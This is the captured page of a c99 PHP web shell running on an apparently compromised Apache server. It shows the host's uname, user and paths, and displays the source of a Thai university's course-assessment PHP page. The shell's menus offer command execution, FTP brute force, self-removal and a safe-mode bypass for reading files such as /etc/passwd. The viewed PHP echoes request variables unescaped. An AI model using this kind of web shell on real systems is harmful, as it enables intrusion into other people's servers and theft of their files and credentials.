!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     searchEpByCourse.php (12.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
/*----------- ผลการประเมินแหล่งฝึก --------*/
?>
<?
include_once "template.php";
showHeader();
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../class/clsReg_Program.php";
include_once 
"../link/function.php";
include_once 
"../class/clsCourseAssess.php";
include_once 
"../class/clsHoldCourse.php";
include_once 
"../class/clsRegistration.php";
include_once 
"../class/clsClassAssess.php";
include_once 
"../class/clsClassOpenForAssess.php";
include_once 
"../class/clsClassInStructorAssess.php";
include_once 
"../class/clsOfficerAssess.php";
include_once 
"../class/clsDefineAssessment.php";
include_once 
"../class/clsAssessForm.php";

include_once 
"../class/clsTimeTableAssess.php";
include_once 
"../class/clsMainExternalPlace.php";
include_once 
"../class/clsSubExternalPlace.php";

sendRequest();

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oReg = new Registration($oCA);

$oDA = new DefineAssessment($oCA);
$oHC = new HoldCourse($oCA);
$oAF = new AssessForm($oCA);
$oOFA = new OfficerAssess($oCA);
$oTT = new TimeTableAssess($oCA);
$oTT2 = new TimeTableAssess($oCA);
$oMep = new MainExternalPlace($oCA);
$oSep = new SubExternalPlace($oCA);

$oClass = new ClassAssess($oCA);
$oClass->SearchByKey($classId);
$oClass->GetRecord();

$oClassIn = new ClassAssess($oCA);
$oClassIn_1 = new ClassAssess($oCA);
$oCIS = new ClassInStructorAssess($oCA);
$oCIS_1 = new ClassInStructorAssess($oCA);
$oClsOpen = new ClassOpenForAssess($oCA);

$oCourse = new CourseAssess($oCA);
$oCourse->SearchByKey($courseId);
$oCourse->GetRecord();

$oReg->RSRegisByStdIdAndClassId($studentId$classId);
$oReg->GetRecord();

$now GetNowDate();
list(
$y$m$d) = split('[-]'$now);
$y=$y+543;
$nowDate=$y."-".$m."-".$d;

$oSse = new SysSemesterDes($oCR);
$oSse->SearchByKey($sem);
$oSse->GetRecord();

$oProg = new Program($oCR);

?>
<script language="JavaScript1.2">
function selectProgram(){
    location.replace('searchEpByCourse.php?courseId='+document.pc.courseId.value+'&acY='+document.pc.acY.value+'&sem='+document.pc.sem.value+'&programSearch='+document.pc.programSearch.value);    
}
function selectPlace(){
    location.replace('searchEpByCourse.php?courseId='+document.pc.courseId.value+'&acY='+document.pc.acY.value+'&sem='+document.pc.sem.value+'&programSearch='+document.pc.programSearch.value+'&epSearch='+document.pc.epSearch.value);    
}
function showDeFormCourse(act){
    if(act == 1)
        document.pc.action = 'showDeEp.php?courseId='+document.pc.courseId.value+'&acadYear='+document.pc.acY.value+'&semester='+document.pc.sem.value+'&programId='+document.pc.programSearch.value+'&officerId=0&classId='+document.pc.groupSearch2.value;
    else
        document.pc.action = 'showDeEp.php?courseId='+document.pc.courseId.value+'&acadYear='+document.pc.acY.value+'&semester='+document.pc.sem.value+'&programId='+document.pc.programSearch.value+'&ep='+document.pc.epSearch.value+'&classId='+document.pc.classSearch.value;
        
}
</script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<table width="742" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td width="742"><br>
      <fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php?mm=1">ผลการประเมิน</a> 
      <img src="../picture/ico3.gif" align="absmiddle" border="0"><a href="showCourseEp.php"> ผลการประเมินแหล่งฝึก
      </a><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle">เลือกแหล่งฝึก/กลุ่มที่เปิดสอน</font></legend>
      </legend> 
      <div align="center"> 
        <form name="pc" method="post" action="<?php echo $PHP_SELF;?>"><br>
            <input type="hidden" name="acY" value="<?=$acY?>"  />
            <input type="hidden" name="sem" value="<?=$sem?>"  />
            <input type="hidden" name="courseId" value="<?=$courseId?>"  />
          <table width="666" align="center" border="0" cellpadding="0" cellspacing="1">
            <tr> 
              <td width="664" height="60">
                <table width="592" border="0" align="center" cellpadding="1" cellspacing="1">
                  <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_7'];?>"> 
                    <td height="24"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b><img src="../picture/bullet1.gif"  border ="0">&nbsp;ปีการศึกษา</b></font></td>
                    <td width="490"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b> 
                      &nbsp;<? echo $oSse->semesterName ?>/<? echo $acY ?></font></td>
                  </tr>
                  <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                    <td width="95" height="24"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b><img src="../picture/bullet1.gif"  border ="0">&nbsp;รหัสรายวิชา</b></font></td>
                    <td><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b> 
                      &nbsp;</font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseCode?> 
                      (<?php echo $oCourse->courseCodeEng?>)</font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b></b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> </b> 
                      </font></td>
                  </tr>
                  <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_7'];?>"> 
                    <td height="20"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b><img src="../picture/bullet1.gif"  border ="0">&nbsp;ชื่อรายวิชา 
                      </b></font></td>
                    <td><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>:</b></font>&nbsp;<font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                      <?php echo $oCourse->courseName?></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                      (<?php echo $oCourse->courseNameEng?>)</font></td>
                  </tr>
                  <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                    <td height="20"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b><img src="../picture/bullet1.gif"  border ="0">&nbsp;หน่วยกิต 
                      </b></font></td>
                    <td><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>: 
                      </b>&nbsp;<?php echo $oCourse->courseUnit;?></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">&nbsp;</font></td>
                  </tr>
                </table>
              </td>
            </tr>
            <tr> 
              <td height="2"></td>
            </tr>
            <tr> 
              <td><br>

              <table width="592" border="0" align="center" headerbgColor = "#B7B7B7">
              
<?  /* -------------- SEARCH PROGRAM -------------- */ ?>
                 <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>"> 
                 <td colspan="5">&nbsp;<img src = "../picture/select.gif" width="15" height="15" border="0">
                   <select name="programSearch" onchange="selectProgram()">
<?php               if(!isset($programSearch)){  ?>
                     <option value="" selected> - - - เลือกหลักสูตร - - - </option>
<?php               }
                        
$oClass->DistinctProgramIdByCourseIdAcYSem($courseId,$acY,$sem);
                        while(
$oClass->GetRecordJoin()) {
                                
$oProg->SearchByKey($oClass->programId);  
                                
$oProg->GetRecord();
                                
$oProg->programName;
?>
                     <option value="<?php echo $oClass->programId;?><? if($oClass->programId == $programSearch) echo "selected"?>>
                       <?=$oProg->programName;?>
                       </option>
                     <?php ?>
                   </select></td>
                </tr>

<?
/*------------ . ผลการประเมินแหล่งฝึก --------------------------------------*/
?>
                  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_13"];?>"> 
                    <td height="23" colspan="5" valign="top"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;<img src="../picture/bookmark.gif" width="12" height="13" border="0">&nbsp;
                      ผลการประเมินแหล่งฝึก</font></td>
                  </tr>

<? /* ----------------------- SEARCH PLACE ------------------ */ ?>
                 <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>"> 
                 <td colspan="5">&nbsp;&nbsp;&nbsp;&nbsp;<img src="../picture/assEp.jpg"  border ="0" width="16" height="16">
                 <?
                 $oTT
->RSHoldPlaceByAcYSePgCo($acY,$sem,$programSearch,$courseId);

?>
                    <select name="epSearch" onchange="selectPlace()">
<?php               if(!isset($programSearch)){  ?>
                     <option value="%" selected> - - เลือกแหล่งฝึก - -</option>
<?php               }else{ ?>
                     <option value="%" <? if('%' == $epSearch) echo "selected"?>> - ทุกแหล่งฝึก -</option>
<?php                   $oTT->RSMainPlaceByAcYSePgCo($acY,$sem,$programSearch,$courseId);
                        while(
$oTT->GetRecord()) {
                            
$oTT2->RSSubPlaceByAcYSePgCoMep($acY,$sem,$programSearch,$courseId,$oTT->ttEpMepId);
                            while(
$oTT2->GetRecord()) {
                                
$oMep->SearchById($oTT->ttEpMepId);
                                
$oMep->GetRecord();
                                
$oSep->SearchByKey($oTT2->ttEpSepId);
                                
$oSep->GetRecord();
?>
                            <option value="<?php echo "$oMep->mepId-$oSep->sepId";?><? if($epSearch == "$oMep->mepId-$oSep->sepId") echo "selected"?> ><?php echo $oMep->mepName.", ".$oSep->sepName?></option>
<?php                       }
                        }
                    }
?>
                   </select>
                   <? /* ----------------------- SEARCH Class From TEACHER ------------------ */ ?>
<?
                    
if(isset($epSearch)){
                        list(
$mepId$sepId) = preg_split('[-]'$epSearch);
                    }
?>
                   <select name="classSearch"  onChange="groupTeacher()" >
                    <?php if(!isset($epSearch)){  ?>
                    <option value=" " selected>  - เลือกกลุ่ม -</option>
                    <?php }else{ ?>
                    <option value="%" <? if('%' == $epSearch) echo "selected"?>> - รวมทุกกลุ่ม -</option>
                    <?php        

                        $oClass
->RSByAcYSePgCoMepSep($acY,$sem,$programSearch,$courseId,$mepId$sepId);
                        while(
$oClass->GetRecord()) {
                    
?>
                        <option value="<?=$oClass->classId?>" ><?php echo 'ชั้นปี '.$oClass->studentYear.' /  '.$oClass->section;    ?></option>
                        <?php }  } ?>
                      </select>

                    <input type="submit" name="Submit" value="ตกลง"  onclick="showDeFormCourse(2)" />                  </td>
                 </tr>        
                </table>
                <table width="90%" border="0" align="center">
                  <tr>
                    <td>&nbsp;</td>
                  </tr>
                  <tr>
                    <td height="26"><input type="button" name="back22" value="ย้อนกลับ" onClick=" location.href = 'showCourseEp.php?'">
                      <input type="button" name="back2" value="กลับสู่หน้าหลัก" onClick=" location.href = 'index.php?mm=1'">
                    </td>
                  </tr>
                </table></td>
            </tr>
          </table>
          <br>
</form></div></label>
</fieldset><br>
      <table width="89%" border="0">
        <tr> 
          <td width="11%"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><strong>หมายเหตุ 
            : </strong></font></td>
          <td width="89%" height="27" colspan="2"><font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2">คลิกที่ 
            <img src = "../picture/select.gif" border="0"> เพื่อเลือกอาจารย์ผู้สอนโดยแยกเป็นหลักกสูตร/ชั้นปี/กลุ่ม</font></td>
        </tr>
        <tr> 
          <td width="11%">&nbsp;</td>
          <td height="27" colspan="2">&nbsp;</td>
        </tr>
        <? $oProg->SearchByProgramStatusY(); 
        while(
$oProg->GetRecord()){ ?>
        <tr> 
          <td width="11%">&nbsp;</td>
          <td height="27" colspan="2">&nbsp;</td>
        </tr>
        <? ?>
      </table></td>
</tr>
</table>
<form name="silent" id="silent" style="margin:0px; padding: 0px;" method="post"></form>
<?php
    showFooter
();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0084 ]--